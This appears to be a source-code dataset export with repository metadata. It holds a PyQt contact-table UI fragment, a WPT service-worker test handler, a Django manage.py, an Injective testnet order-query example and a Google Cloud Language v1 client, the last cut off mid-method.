self.scrollAreaWidgetContents_2.setGeometry(QtCore.QRect(0, 0, 950, 506))
self.scrollAreaWidgetContents_2.setObjectName("scrollAreaWidgetContents_2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.scrollAreaWidgetContents_2)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 1)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.tabela_de_contatos = QtWidgets.QTableView(self.scrollAreaWidgetContents_2)
self.tabela_de_contatos.setStyleSheet("#tabela_de_contatos{\n"
" color: black;\n"
" \n"
" background-color: rgb(255, 255, 224);\n"
"}")
self.tabela_de_contatos.setFrameShape(QtWidgets.QFrame.NoFrame)
self.tabela_de_contatos.setObjectName("tabela_de_contatos")
self.verticalLayout_2.addWidget(self.tabela_de_contatos)
self.scrollArea.setWidget(self.scrollAreaWidgetContents_2)
self.verticalLayout.addWidget(self.scrollArea)
self.barra_de_botoes = QtWidgets.QFrame(self.centralwidget)
self.barra_de_botoes.setMaximumSize(QtCore.QSize(16777215, 60))
self.barra_de_botoes.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.barra_de_botoes.setFrameShadow(QtWidgets.QFrame.Raised)
self.barra_de_botoes.setObjectName("barra_de_botoes")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.barra_de_botoes)
self.horizontalLayout.setContentsMargins(4, 0, 4, 0)
self.horizontalLayout.setSpacing(10)
self.horizontalLayout.setObjectName("horizontalLayout")
self.b_adicionar = QtWidgets.QPushButton(self.barra_de_botoes)
self.b_adicionar.setMinimumSize(QtCore.QSize(0, 33))
self.b_adicionar.setStyleSheet("#b_adicionar{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_adicionar:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#b_adicionar:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.b_adicionar.setObjectName("b_adicionar")
self.horizontalLayout.addWidget(self.b_adicionar)
self.b_atualizar = QtWidgets.QPushButton(self.barra_de_botoes)
self.b_atualizar.setMinimumSize(QtCore.QSize(0, 33))
self.b_atualizar.setStyleSheet("#b_atualizar{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_atualizar:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#b_atualizar:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.b_atualizar.setObjectName("b_atualizar")
self.horizontalLayout.addWidget(self.b_atualizar)
self.b_deletar = QtWidgets.QPushButton(self.barra_de_botoes)
self.b_deletar.setMinimumSize(QtCore.QSize(0, 33))
self.b_deletar.setStyleSheet("#b_deletar{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" border-style: solid;\n"
"}\n"
"\n"
"#b_deletar:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#b_deletar:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.b_deletar.setObjectName("b_deletar")
self.horizontalLayout.addWidget(self.b_deletar)
self.refresh = QtWidgets.QPushButton(self.barra_de_botoes)
self.refresh.setMinimumSize(QtCore.QSize(0, 40))
self.refresh.setMaximumSize(QtCore.QSize(70, 16777215))
self.refresh.setStyleSheet("#refresh{\n"
" color: white;\n"
" background-color: rgb(63, 125, 174);\n"
" background-image: url(:/imagens/rotacaoE.png);\n"
" background-position:center;\n"
" border-style: solid;\n"
"}\n"
"\n"
"#refresh:hover{\n"
" background-color: rgb(0, 255, 127);\n"
"}\n"
"\n"
"#refresh:pressed{\n"
" background-color: rgb(255, 255, 0);\n"
"}")
self.refresh.setText("")
self.refresh.setObjectName("refresh")
self.horizontalLayout.addWidget(self.refresh)
self.verticalLayout.addWidget(self.barra_de_botoes)
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.label_2.setText(_translate("MainWindow", "UserName"))
self.b_procurar.setText(_translate("MainWindow", "Buscar"))
self.b_sair.setText(_translate("MainWindow", "Sair"))
self.b_adicionar.setText(_translate("MainWindow", "ADICIONAR"))
self.b_atualizar.setText(_translate("MainWindow", "ATUALIZAR"))
self.b_deletar.setText(_translate("MainWindow", "DELETAR"))
| true
| true
|
1c447e118ee71765a18a3343c88e0fc0fd12ee27
| 555
|
py
|
Python
|
service-workers/service-worker/resources/update-missing-import-scripts-main-worker.py
|
meyerweb/wpt
|
f04261533819893c71289614c03434c06856c13e
|
[
"BSD-3-Clause"
] | 14,668
|
2015-01-01T01:57:10.000Z
|
2022-03-31T23:33:32.000Z
|
service-workers/service-worker/resources/update-missing-import-scripts-main-worker.py
|
meyerweb/wpt
|
f04261533819893c71289614c03434c06856c13e
|
[
"BSD-3-Clause"
] | 7,642
|
2018-05-28T09:38:03.000Z
|
2022-03-31T20:55:48.000Z
|
service-workers/service-worker/resources/update-missing-import-scripts-main-worker.py
|
meyerweb/wpt
|
f04261533819893c71289614c03434c06856c13e
|
[
"BSD-3-Clause"
] | 5,941
|
2015-01-02T11:32:21.000Z
|
2022-03-31T16:35:46.000Z
|
from wptserve.utils import isomorphic_decode
def main(request, response):
key = request.GET[b'key']
already_requested = request.server.stash.take(key)
header = [(b'Content-Type', b'application/javascript')]
initial_script = u'importScripts("./update-missing-import-scripts-imported-worker.py?key={0}")'.format(isomorphic_decode(key))
updated_script = u'// removed importScripts()'
if already_requested is None:
request.server.stash.put(key, True)
return header, initial_script
return header, updated_script
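# --- Standalone sketch (not part of the original handler) ---
# Reproduces the one-shot toggle above with a plain dict in place of
# wptserve's cross-request stash: take() is a read-and-remove, so only
# the first request per key sees None and gets the importScripts() worker.
if __name__ == '__main__':
    data = {}
    for n in (1, 2):
        if data.pop(b'key', None) is None:   # like stash.take()
            data[b'key'] = True              # like stash.put()
            print(n, 'importScripts("...")')
        else:
            print(n, '// removed importScripts()')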
| 34.6875
| 130
| 0.722523
|
from wptserve.utils import isomorphic_decode
def main(request, response):
key = request.GET[b'key']
already_requested = request.server.stash.take(key)
header = [(b'Content-Type', b'application/javascript')]
initial_script = u'importScripts("./update-missing-import-scripts-imported-worker.py?key={0}")'.format(isomorphic_decode(key))
updated_script = u'// removed importScripts()'
if already_requested is None:
request.server.stash.put(key, True)
return header, initial_script
return header, updated_script
| true
| true
|
1c447e3673bf441602a3991a418258f9af63b818
| 1,055
|
py
|
Python
|
manage.py
|
Zamy97/Algorithms_Explained
|
048022903da4199b3d245997e95c172cfbea508f
|
[
"MIT"
] | 1
|
2020-09-22T14:29:46.000Z
|
2020-09-22T14:29:46.000Z
|
manage.py
|
Zamy97/Algorithms_Explained
|
048022903da4199b3d245997e95c172cfbea508f
|
[
"MIT"
] | null | null | null |
manage.py
|
Zamy97/Algorithms_Explained
|
048022903da4199b3d245997e95c172cfbea508f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.local")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django # noqa
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
# This allows easy placement of apps within the interior
# algorithms_explained directory.
current_path = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(current_path, "algorithms_explained"))
execute_from_command_line(sys.argv)
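# --- Note (not part of the original file) ---
# With "<repo>/algorithms_explained" appended to sys.path above, apps that
# live inside that directory can be referenced by bare name in settings,
# e.g. INSTALLED_APPS = [..., "users"] rather than
# "algorithms_explained.users" (the app name here is hypothetical).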
| 34.032258
| 77
| 0.664455
|
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.local")
try:
from django.core.management import execute_from_command_line
except ImportError:
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
current_path = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(current_path, "algorithms_explained"))
execute_from_command_line(sys.argv)
| true
| true
|
1c447e6400e709ae86806edfead5fe49bd6a8135
| 1,374
|
py
|
Python
|
examples/async/exchange_client/spot_exchange_rpc/5_Orders.py
|
InjectiveLabs/sdk-python
|
d98382d450f4e6043d8fc34b621215fb14f958f2
|
[
"Apache-2.0"
] | 10
|
2021-09-07T08:03:52.000Z
|
2022-03-08T08:39:30.000Z
|
examples/async/exchange_client/spot_exchange_rpc/5_Orders.py
|
InjectiveLabs/sdk-python
|
d98382d450f4e6043d8fc34b621215fb14f958f2
|
[
"Apache-2.0"
] | 39
|
2021-08-19T20:09:35.000Z
|
2022-03-22T19:51:59.000Z
|
examples/async/exchange_client/spot_exchange_rpc/5_Orders.py
|
InjectiveLabs/sdk-python
|
d98382d450f4e6043d8fc34b621215fb14f958f2
|
[
"Apache-2.0"
] | 5
|
2021-11-02T16:23:48.000Z
|
2022-01-20T22:30:05.000Z
|
# Copyright 2021 Injective Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Injective Exchange API client for Python. Example only."""
import asyncio
import logging
from pyinjective.async_client import AsyncClient
from pyinjective.constant import Network
async def main() -> None:
network = Network.testnet()
client = AsyncClient(network, insecure=False)
market_id = "0xa508cb32923323679f29a032c70342c147c17d0145625922b0ef22e955c844c0"
order_side = "sell" # buy or sell
subaccount_id = "0xaf79152ac5df276d9a8e1e2e22822f9713474902000000000000000000000000"
orders = await client.get_spot_orders(
market_id=market_id,
order_side=order_side,
subaccount_id=subaccount_id
)
print(orders)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
asyncio.get_event_loop().run_until_complete(main())
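# --- Note (not part of the original example) ---
# get_event_loop().run_until_complete() is the older entry-point pattern;
# on Python 3.7+ the equivalent, now-preferred form is:
#
#     asyncio.run(main())
#
# which creates and closes the event loop itself.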
| 36.157895
| 88
| 0.762009
|
import asyncio
import logging
from pyinjective.async_client import AsyncClient
from pyinjective.constant import Network
async def main() -> None:
network = Network.testnet()
client = AsyncClient(network, insecure=False)
market_id = "0xa508cb32923323679f29a032c70342c147c17d0145625922b0ef22e955c844c0"
order_side = "sell"
subaccount_id = "0xaf79152ac5df276d9a8e1e2e22822f9713474902000000000000000000000000"
orders = await client.get_spot_orders(
market_id=market_id,
order_side=order_side,
subaccount_id=subaccount_id
)
print(orders)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
asyncio.get_event_loop().run_until_complete(main())
| true
| true
|
1c447eb7147743f31a6feffd42b5ffac2e5fe09c
| 24,457
|
py
|
Python
|
language/google/cloud/language_v1/gapic/language_service_client.py
|
nielm/google-cloud-python
|
fd126fdea34206109eb00d675374ff7dc4dcc5ef
|
[
"Apache-2.0"
] | 1
|
2019-01-23T21:54:51.000Z
|
2019-01-23T21:54:51.000Z
|
language/google/cloud/language_v1/gapic/language_service_client.py
|
nielm/google-cloud-python
|
fd126fdea34206109eb00d675374ff7dc4dcc5ef
|
[
"Apache-2.0"
] | 1
|
2018-04-06T19:51:23.000Z
|
2018-04-06T19:51:23.000Z
|
language/google/cloud/language_v1/gapic/language_service_client.py
|
nielm/google-cloud-python
|
fd126fdea34206109eb00d675374ff7dc4dcc5ef
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Accesses the google.cloud.language.v1 LanguageService API."""
import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.grpc_helpers
import grpc
from google.cloud.language_v1.gapic import enums
from google.cloud.language_v1.gapic import language_service_client_config
from google.cloud.language_v1.gapic.transports import language_service_grpc_transport
from google.cloud.language_v1.proto import language_service_pb2
from google.cloud.language_v1.proto import language_service_pb2_grpc
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution("google-cloud-language").version
class LanguageServiceClient(object):
"""
Provides text analysis operations such as sentiment analysis and entity
recognition.
"""
SERVICE_ADDRESS = "language.googleapis.com:443"
"""The default address of the service."""
# The name of the interface for this client. This is the key used to
# find the method configuration in the client_config dictionary.
_INTERFACE_NAME = "google.cloud.language.v1.LanguageService"
@classmethod
def from_service_account_file(cls, filename, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
LanguageServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
def __init__(
self,
transport=None,
channel=None,
credentials=None,
client_config=None,
client_info=None,
):
"""Constructor.
Args:
transport (Union[~.LanguageServiceGrpcTransport,
Callable[[~.Credentials, type], ~.LanguageServiceGrpcTransport]): A transport
instance, responsible for actually making the API calls.
The default transport uses the gRPC protocol.
This argument may also be a callable which returns a
transport instance. Callables will be sent the credentials
as the first argument and the default transport class as
the second argument.
channel (grpc.Channel): DEPRECATED. A ``Channel`` instance
through which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is mutually exclusive with providing a
transport instance to ``transport``; doing so will raise
an exception.
client_config (dict): DEPRECATED. A dictionary of call options for
each method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# Raise deprecation warnings for things we want to go away.
if client_config is not None:
warnings.warn(
"The `client_config` argument is deprecated.",
PendingDeprecationWarning,
stacklevel=2,
)
else:
client_config = language_service_client_config.config
if channel:
warnings.warn(
"The `channel` argument is deprecated; use " "`transport` instead.",
PendingDeprecationWarning,
stacklevel=2,
)
# Instantiate the transport.
# The transport is responsible for handling serialization and
# deserialization and actually sending data to the service.
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=language_service_grpc_transport.LanguageServiceGrpcTransport,
)
else:
if credentials:
raise ValueError(
"Received both a transport instance and "
"credentials; these are mutually exclusive."
)
self.transport = transport
else:
self.transport = language_service_grpc_transport.LanguageServiceGrpcTransport(
address=self.SERVICE_ADDRESS, channel=channel, credentials=credentials
)
if client_info is None:
client_info = google.api_core.gapic_v1.client_info.ClientInfo(
gapic_version=_GAPIC_LIBRARY_VERSION
)
else:
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
self._client_info = client_info
# Parse out the default settings for retry and timeout for each RPC
# from the client configuration.
# (Ordinarily, these are the defaults specified in the `*_config.py`
# file next to this one.)
self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config["interfaces"][self._INTERFACE_NAME]
)
# Save a dictionary of cached API call functions.
# These are the actual callables which invoke the proper
# transport methods, wrapped with `wrap_method` to add retry,
# timeout, and the like.
self._inner_api_calls = {}
# Service calls
def analyze_sentiment(
self,
document,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Analyzes the sentiment of the provided text.
Example:
>>> from google.cloud import language_v1
>>>
>>> client = language_v1.LanguageServiceClient()
>>>
>>> # TODO: Initialize `document`:
>>> document = {}
>>>
>>> response = client.analyze_sentiment(document)
Args:
document (Union[dict, ~google.cloud.language_v1.types.Document]): Input document.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.language_v1.types.Document`
encoding_type (~google.cloud.language_v1.types.EncodingType): The encoding type used by the API to calculate sentence offsets.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.language_v1.types.AnalyzeSentimentResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "analyze_sentiment" not in self._inner_api_calls:
self._inner_api_calls[
"analyze_sentiment"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.analyze_sentiment,
default_retry=self._method_configs["AnalyzeSentiment"].retry,
default_timeout=self._method_configs["AnalyzeSentiment"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnalyzeSentimentRequest(
document=document, encoding_type=encoding_type
)
return self._inner_api_calls["analyze_sentiment"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def analyze_entities(
self,
document,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Finds named entities (currently proper names and common nouns) in the text
along with entity types, salience, mentions for each entity, and
other properties.
Example:
>>> from google.cloud import language_v1
>>>
>>> client = language_v1.LanguageServiceClient()
>>>
>>> # TODO: Initialize `document`:
>>> document = {}
>>>
>>> response = client.analyze_entities(document)
Args:
document (Union[dict, ~google.cloud.language_v1.types.Document]): Input document.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.language_v1.types.Document`
encoding_type (~google.cloud.language_v1.types.EncodingType): The encoding type used by the API to calculate offsets.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.language_v1.types.AnalyzeEntitiesResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "analyze_entities" not in self._inner_api_calls:
self._inner_api_calls[
"analyze_entities"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.analyze_entities,
default_retry=self._method_configs["AnalyzeEntities"].retry,
default_timeout=self._method_configs["AnalyzeEntities"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnalyzeEntitiesRequest(
document=document, encoding_type=encoding_type
)
return self._inner_api_calls["analyze_entities"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def analyze_entity_sentiment(
self,
document,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Finds entities, similar to ``AnalyzeEntities`` in the text and analyzes
sentiment associated with each entity and its mentions.
Example:
>>> from google.cloud import language_v1
>>>
>>> client = language_v1.LanguageServiceClient()
>>>
>>> # TODO: Initialize `document`:
>>> document = {}
>>>
>>> response = client.analyze_entity_sentiment(document)
Args:
document (Union[dict, ~google.cloud.language_v1.types.Document]): Input document.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.language_v1.types.Document`
encoding_type (~google.cloud.language_v1.types.EncodingType): The encoding type used by the API to calculate offsets.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.language_v1.types.AnalyzeEntitySentimentResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "analyze_entity_sentiment" not in self._inner_api_calls:
self._inner_api_calls[
"analyze_entity_sentiment"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.analyze_entity_sentiment,
default_retry=self._method_configs["AnalyzeEntitySentiment"].retry,
default_timeout=self._method_configs["AnalyzeEntitySentiment"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnalyzeEntitySentimentRequest(
document=document, encoding_type=encoding_type
)
return self._inner_api_calls["analyze_entity_sentiment"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def analyze_syntax(
self,
document,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Analyzes the syntax of the text and provides sentence boundaries and
tokenization along with part of speech tags, dependency trees, and other
properties.
Example:
>>> from google.cloud import language_v1
>>>
>>> client = language_v1.LanguageServiceClient()
>>>
>>> # TODO: Initialize `document`:
>>> document = {}
>>>
>>> response = client.analyze_syntax(document)
Args:
document (Union[dict, ~google.cloud.language_v1.types.Document]): Input document.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.language_v1.types.Document`
encoding_type (~google.cloud.language_v1.types.EncodingType): The encoding type used by the API to calculate offsets.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.language_v1.types.AnalyzeSyntaxResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "analyze_syntax" not in self._inner_api_calls:
self._inner_api_calls[
"analyze_syntax"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.analyze_syntax,
default_retry=self._method_configs["AnalyzeSyntax"].retry,
default_timeout=self._method_configs["AnalyzeSyntax"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnalyzeSyntaxRequest(
document=document, encoding_type=encoding_type
)
return self._inner_api_calls["analyze_syntax"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def classify_text(
self,
document,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
Classifies a document into categories.
Example:
>>> from google.cloud import language_v1
>>>
>>> client = language_v1.LanguageServiceClient()
>>>
>>> # TODO: Initialize `document`:
>>> document = {}
>>>
>>> response = client.classify_text(document)
Args:
document (Union[dict, ~google.cloud.language_v1.types.Document]): Input document.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.language_v1.types.Document`
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.language_v1.types.ClassifyTextResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "classify_text" not in self._inner_api_calls:
self._inner_api_calls[
"classify_text"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.classify_text,
default_retry=self._method_configs["ClassifyText"].retry,
default_timeout=self._method_configs["ClassifyText"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.ClassifyTextRequest(document=document)
return self._inner_api_calls["classify_text"](
request, retry=retry, timeout=timeout, metadata=metadata
)
def annotate_text(
self,
document,
features,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
"""
A convenience method that provides all the features that analyzeSentiment,
analyzeEntities, and analyzeSyntax provide in one call.
Example:
>>> from google.cloud import language_v1
>>>
>>> client = language_v1.LanguageServiceClient()
>>>
>>> # TODO: Initialize `document`:
>>> document = {}
>>>
>>> # TODO: Initialize `features`:
>>> features = {}
>>>
>>> response = client.annotate_text(document, features)
Args:
document (Union[dict, ~google.cloud.language_v1.types.Document]): Input document.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.language_v1.types.Document`
features (Union[dict, ~google.cloud.language_v1.types.Features]): The enabled features.
If a dict is provided, it must be of the same form as the protobuf
message :class:`~google.cloud.language_v1.types.Features`
encoding_type (~google.cloud.language_v1.types.EncodingType): The encoding type used by the API to calculate offsets.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.cloud.language_v1.types.AnnotateTextResponse` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if "annotate_text" not in self._inner_api_calls:
self._inner_api_calls[
"annotate_text"
] = google.api_core.gapic_v1.method.wrap_method(
self.transport.annotate_text,
default_retry=self._method_configs["AnnotateText"].retry,
default_timeout=self._method_configs["AnnotateText"].timeout,
client_info=self._client_info,
)
request = language_service_pb2.AnnotateTextRequest(
document=document, features=features, encoding_type=encoding_type
)
return self._inner_api_calls["annotate_text"](
request, retry=retry, timeout=timeout, metadata=metadata
)
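# A minimal usage sketch for the client above, assuming application-default
# credentials are available in the environment; the sample text and printed
# fields are illustrative only, not part of the original file's API surface.
if __name__ == "__main__":
    from google.cloud import language_v1

    demo_client = language_v1.LanguageServiceClient()
    demo_document = {
        "content": "The new museum exhibit was a delight to visit.",
        "type": language_v1.enums.Document.Type.PLAIN_TEXT,
    }
    sentiment = demo_client.analyze_sentiment(demo_document).document_sentiment
    print(sentiment.score, sentiment.magnitude)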
| 43.517794
| 138
| 0.623339
|
import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.grpc_helpers
import grpc
from google.cloud.language_v1.gapic import enums
from google.cloud.language_v1.gapic import language_service_client_config
from google.cloud.language_v1.gapic.transports import language_service_grpc_transport
from google.cloud.language_v1.proto import language_service_pb2
from google.cloud.language_v1.proto import language_service_pb2_grpc
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution("google-cloud-language").version
class LanguageServiceClient(object):
SERVICE_ADDRESS = "language.googleapis.com:443"
_INTERFACE_NAME = "google.cloud.language.v1.LanguageService"
@classmethod
def from_service_account_file(cls, filename, *args, **kwargs):
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
def __init__(
self,
transport=None,
channel=None,
credentials=None,
client_config=None,
client_info=None,
):
if client_config is not None:
warnings.warn(
"The `client_config` argument is deprecated.",
PendingDeprecationWarning,
stacklevel=2,
)
else:
client_config = language_service_client_config.config
if channel:
warnings.warn(
"The `channel` argument is deprecated; use " "`transport` instead.",
PendingDeprecationWarning,
stacklevel=2,
)
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=language_service_grpc_transport.LanguageServiceGrpcTransport,
)
else:
if credentials:
raise ValueError(
"Received both a transport instance and "
"credentials; these are mutually exclusive."
)
self.transport = transport
else:
self.transport = language_service_grpc_transport.LanguageServiceGrpcTransport(
address=self.SERVICE_ADDRESS, channel=channel, credentials=credentials
)
if client_info is None:
client_info = google.api_core.gapic_v1.client_info.ClientInfo(
gapic_version=_GAPIC_LIBRARY_VERSION
)
else:
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
self._client_info = client_info
self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config["interfaces"][self._INTERFACE_NAME]
)
self._inner_api_calls = {}
def analyze_sentiment(
self,
document,
encoding_type=None,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None,
):
if "analyze_sentiment" not in self._inner_api_calls:
self._inner_api_calls[
"analyze_sentiment"
